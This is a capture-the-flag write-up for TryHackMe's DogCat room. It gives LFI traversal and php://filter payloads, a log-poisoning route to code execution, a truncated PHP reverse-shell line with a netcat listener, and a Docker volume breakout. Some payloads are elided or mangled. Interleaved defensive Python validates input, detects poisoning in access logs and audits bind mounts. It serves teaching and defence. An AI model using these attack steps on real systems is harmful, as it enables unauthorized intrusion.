Unveiling the Secrets of DogCat: A Deep Dive into LFI and Docker…

In the vast landscape of cybersecurity, understanding vulnerabilities and exploiting them responsibly is crucial. The DogCat room on TryHackMe offers a unique opportunity to delve into Local File Inclusion (LFI) and Docker privilege escalation. This article will guide you through the process, ensuring you grasp the nuances and complexities involved.

Step 1: Scanning the Target

The journey begins with a thorough scan of the target machine. Using Nmap, a powerful network scanning tool, we can identify open ports and services. The command `nmap -sV -p- ` initiates a comprehensive scan, revealing the following ports:

  • Port 80: HTTP – This port hosts a website displaying dog and cat pictures.
  • Port 22: SSH – Secure Shell (SSH) is a protocol for secure remote login and other secure network services.

Step 2: Enumerating the Web

With the initial scan complete, it’s time to explore the website hosted on port 80. The URL structure is parameter-based, a common indicator of potential vulnerabilities. To test for LFI, we need to manipulate the URL parameters.

Testing for LFI

The initial approach involves using the `../` directory traversal method. However, this method only works when the URL contains a “dog” or “cat” keyword. For instance, `?view=dog/../index` results in a “file cannot be opened” error. This is because the `containsStr()` function is being declared multiple times, likely due to the `index.php` file being included multiple times by the LFI payload.

Bypassing the Issue

To bypass this issue, we can use the `php://filter` wrapper. This wrapper returns a file’s source code (here base64-encoded) instead of executing it, so the function re-declaration error never occurs. The command `?view=php://filter/convert.base64-encode/resource=dog/../../.././…var/www/html/index` reads the index file. The decoded source shows that, to make the LFI work on other files, a second variable, `$ext`, must also be supplied in the URL.
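The following is an added example, not code from the DogCat room or its `index.php`. It models in Python the three ways the `view` parameter could be checked before being handed to an include: the substring keyword check described above, a path-containment check on its own, and an exact allowlist with containment as a second layer. It shows why `dog/../index` and a `php://filter` value pass the keyword check, and why containment alone still lets `dog/../index` reach `index.php`. `WEB_ROOT`, the view names and `EXT` are assumptions for illustration.

```python
# Added example for this write-up; it is not code from the DogCat room.
# It models the checks discussed above so the difference between them can
# be seen on concrete parameter values. WEB_ROOT, ALLOWED_VIEWS and EXT are
# assumptions, not values taken from the room.
import posixpath
from typing import Optional

WEB_ROOT = "/var/www/html"       # assumed document root
ALLOWED_VIEWS = {"dog", "cat"}   # the only views the page is meant to serve
EXT = ".php"                     # extension the application appends


def keyword_check(view: str) -> bool:
    """Substring check of the kind described above: accepts any value that
    merely contains 'dog' or 'cat' somewhere in it."""
    return "dog" in view or "cat" in view


def resolve_view_keyword(view: str) -> Optional[str]:
    """Path the keyword-checked version would hand to include(). Traversal
    sequences and stream-wrapper prefixes survive untouched, which is why
    'dog/../index' and 'php://filter/...resource=dog/..' both get through."""
    if not keyword_check(view):
        return None
    return view + EXT


def resolve_view_contained(view: str) -> Optional[str]:
    """Containment check on its own: reject stream wrappers, normalise, and
    require the result to stay under WEB_ROOT. This blocks escaping the web
    root, but 'dog/../index' still resolves to index.php inside it (the very
    case described above), so containment alone is not enough."""
    if ":" in view or view.startswith("\\"):
        return None  # php://, data://, etc. are never file names here
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, view + EXT))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


def resolve_view_allowlist(view: str) -> Optional[str]:
    """Hardened version: the parameter must match an allowlisted name exactly;
    containment is kept as a second layer in case the list is ever loosened
    to cover a directory of views."""
    if view not in ALLOWED_VIEWS:
        return None
    return resolve_view_contained(view)


def compare(view: str) -> dict:
    """Side-by-side result for one parameter value (None means rejected)."""
    return {
        "view": view,
        "keyword_check": resolve_view_keyword(view),
        "contained": resolve_view_contained(view),
        "allowlist": resolve_view_allowlist(view),
    }


if __name__ == "__main__":
    for v in ("dog", "dog/../index",
              "php://filter/convert.base64-encode/resource=dog/../index",
              "dog/../../../../etc/passwd", "index"):
        print(compare(v))
```

Running the block prints one line per parameter value; only the allowlist column rejects every value except the two real views, which is the property the FAQ's "validate and sanitize" advice needs in practice.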

Step 3: LFI to RCE – Log Poisoning

Log poisoning is a powerful attack method where malicious input is injected into application logs. This can be exploited to gain Remote Code Execution (RCE) via an LFI vulnerability.

Injecting Malicious Input

Using Developer Tools, we can inject the string “Hello World” into the User-Agent header. This string is reflected in the `access.log` files, confirming the vulnerability.

Injecting the Payload

The next step is to inject a PHP payload into the log. The payload `` leverages the `cmd` parameter in the URL, allowing it to be passed to the PHP `system()` function. This enables the execution of system commands directly on the target server.

Executing the Payload

To execute the payload, we need to include the poisoned log file via the LFI vulnerability. This can be done by manipulating the URL parameters. Once the payload is executed, we can gain a foothold on the target system and retrieve the first flag.
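From the defender's side, the log-poisoning chain above leaves two distinct traces in the web server's access log: PHP tags written into a logged header (the User-Agent), and a later request whose `view` parameter traverses to the log file or uses a stream wrapper. The following is an added example, not code from the write-up, that parses Apache combined-format lines and flags both signals. The log lines are constructed for the example; the IPs, timestamps and paths are placeholders.

```python
# Added detection example for this write-up; not code from the original post.
# It scans Apache combined-format access-log lines for the two signals the
# log-poisoning chain above relies on. SAMPLE_LOG is constructed here.
import re
from typing import Dict, List

# Apache combined format: ip - - [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)        # code written into a header
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.%2f|%2e%2e)", re.IGNORECASE)
WRAPPER_RE = re.compile(r"\b(php|data|expect|phar)://", re.IGNORECASE)
LOG_INCLUDE_RE = re.compile(r"(access|error)[._]?log|/var/log/", re.IGNORECASE)

# Constructed sample: one normal request, the "Hello World" marker test,
# a PHP tag in the User-Agent, an attempt to include the log, and a wrapper.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?view=cat HTTP/1.1" 200 498 "-" "Hello World"
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /?view=cat HTTP/1.1" 200 498 "-" "<?php phpinfo(); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /?view=dog/../../../../var/log/apache2/access&ext= HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def analyse_line(line: str) -> Dict[str, object]:
    """Parse one log line and return the findings for it (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "line": line, "findings": ["unparsed line"]}
    findings: List[str] = []
    ua, request = m.group("ua"), m.group("request")
    if PHP_TAG_RE.search(ua):
        findings.append("PHP tag in User-Agent (log poisoning attempt)")
    if TRAVERSAL_RE.search(request):
        findings.append("directory traversal in request")
    if WRAPPER_RE.search(request):
        findings.append("PHP stream wrapper in request")
    if LOG_INCLUDE_RE.search(request):
        findings.append("log file referenced in request (poisoned-log include)")
    return {"parsed": True, "ip": m.group("ip"), "time": m.group("time"),
            "findings": findings}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Analyse every non-empty line of a log."""
    return [analyse_line(line) for line in text.splitlines() if line.strip()]


def suspicious_ips(text: str) -> Dict[str, int]:
    """Count flagged lines per source IP; the poisoning and the include
    normally come from the same client, so the count pairs them up."""
    counts: Dict[str, int] = {}
    for r in scan_log(text):
        if r["parsed"] and r["findings"]:
            counts[str(r["ip"])] = counts.get(str(r["ip"]), 0) + 1
    return counts


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        if r["findings"]:
            print(r["ip"], r["time"], "; ".join(r["findings"]))
    print(suspicious_ips(SAMPLE_LOG))
```

The "Hello World" marker itself is not flagged, since it is harmless on its own; what matters for detection is a PHP open tag landing in a logged header followed by a request that reaches for the log through the include parameter, and the per-IP count ties the two together.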

Step 4: Getting a Reverse Shell

With the initial foothold established, the next step is to gain a reverse shell. This allows us to interact with the target system more effectively.

URL Encoding the Payload

The payload `php -r '$sock=fsockope… <&3 >&3 2>&3");` is URL encoded and injected into the target system. This payload creates a reverse shell, connecting back to our machine.

Setting Up a Netcat Listener

A Netcat listener is set up on our machine to receive the reverse shell. Once the payload is executed, we gain a reverse shell and can navigate the file system to retrieve the second flag.

Step 5: Privilege Escalation

With a reverse shell established, the next step is to escalate privileges. This involves finding and exploiting vulnerabilities that allow us to gain root access.

Using Sudo -l

The `sudo -l` command lists the commands the current user is allowed to run with sudo, including any that can be run without providing a password. This information is crucial for privilege escalation assessments.

Step 6: Docker Breakout

The DogCat room is hosted in a Docker environment. This presents an opportunity to exploit Docker-specific vulnerabilities.

Finding the Backup File

Upon inspecting the system, we find a backup file in `/opt`. The `launch.sh` file reveals that a volume is mounted from the Docker container to the host system.

Exploiting the Backup File

The `backup.sh` script creates a tar archive of the `/root/container` directory. This archive can be exploited to gain root access. By manipulating the tar archive, we can escape the Docker container and gain root access on the host system.
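What makes this breakout possible is a host directory bind-mounted into the container and then used by something that runs on the host, so the audit a defender wants is of the mounts themselves. The following is an added example, not the room's `launch.sh` or `backup.sh`: it parses `docker run` lines from a launch script and rates each host bind mount, treating read-write host paths, system directories and the Docker socket as the findings to review. The script text, container names and paths are constructed placeholders, and the risk ratings are this example's own.

```python
# Added example; not the room's launch.sh or backup.sh. Parses `docker run`
# lines from a launch script and reports host bind mounts, because a host
# directory mounted read-write into a container (and then used by a job on
# the host) is the condition the breakout above depends on. SAMPLE_LAUNCH_SH
# and its paths are constructed placeholders.
import posixpath
import shlex
from typing import Dict, List

SAMPLE_LAUNCH_SH = """\
#!/bin/bash
# constructed stand-in for a launch script (placeholder paths, not the room's)
docker run -d --name web -p 80:80 -v /opt/backups:/opt/backups -v /srv/static:/var/www/static:ro webapp:latest
docker run -d --name agent -v /var/run/docker.sock:/var/run/docker.sock agent:latest
"""

DOCKER_SOCKET = "/var/run/docker.sock"
SENSITIVE_DIRS = ("/etc", "/root", "/home", "/proc", "/sys", "/dev", "/boot",
                  "/usr", "/bin", "/sbin", "/lib")


def _is_sensitive(host_path: str) -> bool:
    """True for the host root, the Docker socket, or any system directory."""
    p = posixpath.normpath(host_path)
    if p == "/" or p == DOCKER_SOCKET:
        return True
    return any(p == d or p.startswith(d + "/") for d in SENSITIVE_DIRS)


def _risk(mount: Dict[str, object]) -> str:
    """Rate one bind mount. Ratings are this example's own, not Docker's."""
    if mount["privileged"] or mount["host_path"] == DOCKER_SOCKET:
        return "high"      # control of the host either way
    if mount["mode"] == "rw" and _is_sensitive(str(mount["host_path"])):
        return "high"      # writable system directory
    if mount["mode"] == "rw":
        return "medium"    # host files writable from inside the container
    return "low"           # read-only


def parse_run_line(tokens: List[str]) -> List[Dict[str, object]]:
    """Extract host bind mounts from the tokens of one `docker run` command."""
    name = "<unnamed>"
    privileged = "--privileged" in tokens
    for i, tok in enumerate(tokens):
        if tok == "--name" and i + 1 < len(tokens):
            name = tokens[i + 1]
        elif tok.startswith("--name="):
            name = tok.split("=", 1)[1]
    mounts: List[Dict[str, object]] = []
    for i, tok in enumerate(tokens):
        if tok in ("-v", "--volume") and i + 1 < len(tokens):
            spec = tokens[i + 1]
        elif tok.startswith("--volume="):
            spec = tok.split("=", 1)[1]
        else:
            continue
        parts = spec.split(":")
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue  # named or anonymous volume, not a host path
        opts = parts[2].split(",") if len(parts) > 2 else []
        mount: Dict[str, object] = {
            "container": name, "host_path": parts[0], "container_path": parts[1],
            "mode": "ro" if "ro" in opts else "rw", "privileged": privileged,
        }
        mount["risk"] = _risk(mount)
        mounts.append(mount)
    return mounts


def audit_launch_script(script: str) -> List[Dict[str, object]]:
    """Audit every `docker run` line in a launch script; comments are skipped."""
    findings: List[Dict[str, object]] = []
    for line in script.splitlines():
        tokens = shlex.split(line, comments=True)
        if len(tokens) >= 2 and tokens[0] == "docker" and tokens[1] == "run":
            findings.extend(parse_run_line(tokens))
    return findings


if __name__ == "__main__":
    for m in audit_launch_script(SAMPLE_LAUNCH_SH):
        print(f'{m["risk"]:6} {m["container"]:6} {m["host_path"]} -> '
              f'{m["container_path"]} ({m["mode"]})')
```

A "medium" finding such as a read-write `/opt/backups` is the one to look at most closely in a setup like this room's: on its own it only exposes files, but if anything on the host executes what lives in that directory, a write from inside the container becomes code running as that host user. Making such mounts read-only, or moving host-side scripts out of the shared path, removes the condition.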

Conclusion

The DogCat room on TryHackMe offers a comprehensive exploration of LFI and Docker privilege escalation. By following the steps outlined in this article, you can gain a deep understanding of these vulnerabilities and learn how to exploit them responsibly.

FAQ

What is LFI?

Local File Inclusion (LFI) is a vulnerability that allows an attacker to include or execute files on the target system. This can be exploited to read sensitive files or gain Remote Code Execution (RCE).

What is Docker privilege escalation?

Docker privilege escalation involves exploiting vulnerabilities in the Docker environment to gain root access on the host system. This can be done by manipulating mounted volumes or exploiting misconfigurations in the Docker container.

How can I protect against LFI and Docker privilege escalation?

To protect against LFI, ensure that user input is validated and sanitized. To protect against Docker privilege escalation, ensure that Docker containers are run with the least privileges necessary and that mounted volumes are secured.

What tools can I use to test for LFI and Docker privilege escalation?

Tools like Nmap, Burp Suite, and Metasploit can be used to test for LFI and Docker privilege escalation. Additionally, resources like RevShells and GTFOBins can provide valuable payloads and exploitation techniques.

Is it legal to exploit vulnerabilities in the DogCat room?

Exploiting vulnerabilities in the DogCat room is legal as long as it is done responsibly and ethically. The room is designed for educational purposes, and exploiting it can help you learn and improve your cybersecurity skills.
